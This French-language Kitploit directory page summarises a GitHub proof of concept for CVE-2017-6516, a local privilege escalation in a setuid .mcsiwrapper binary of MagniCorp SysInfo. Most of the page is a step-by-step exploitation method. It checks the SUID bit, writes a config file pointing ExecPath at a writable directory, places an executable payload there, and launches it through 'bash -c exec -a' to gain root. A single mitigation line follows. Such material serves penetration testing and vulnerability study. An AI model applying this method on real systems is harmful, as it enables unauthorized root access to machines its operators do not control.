Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-6516-mcsiwrapper- — Un PoC / une méthodologie pour exploiter CVE-2017-6516 | Kitploit
Outils/GitHubGitHub/rubytox/cve-2017-6516-mcsiwrapper-
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionExploitation de Binaires
GitHubrubytox/cve-2017-6516-mcsiwrapper-

CVE-2017-6516-mcsiwrapper-

Un PoC / une méthodologie pour exploiter CVE-2017-6516

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-6516

CVE-2017-6516 est une vulnérabilité d'élévation de privilèges qui cible le binaire .mcsiwrapper de MagniCorp SysInfo sous la version 10-H64. Lorsque ce binaire a le bit SUID activé et est obsolète, un utilisateur peut exécuter du code arbitraire en tant que propriétaire du binaire – souvent root.

Prérequis

  • Le binaire .mcsiwrapper doit être setuid :
root@kitploit:~
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
  • Le binaire .mcsiwrapper doit être sous la version 10-H64 :
root@kitploit:~
$ .mcsiwrapper --version
<Version under 10-H64>

Exploitation

Créez un fichier config avec le contenu suivant :

root@kitploit:~
ExecPath=<Path to a writeable directory>

Créez un fichier exécutable de payload dans le répertoire ExecPath, par exemple :

root@kitploit:~
#!/bin/sh
whoami

Et rendez-le exécutable :

root@kitploit:~
$ chmod +x payload

Exécutez la commande :

root@kitploit:~
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root

Atténuations

Mettez à jour .mcsiwrapper vers au moins la version 10-H64.

Télécharger l’outil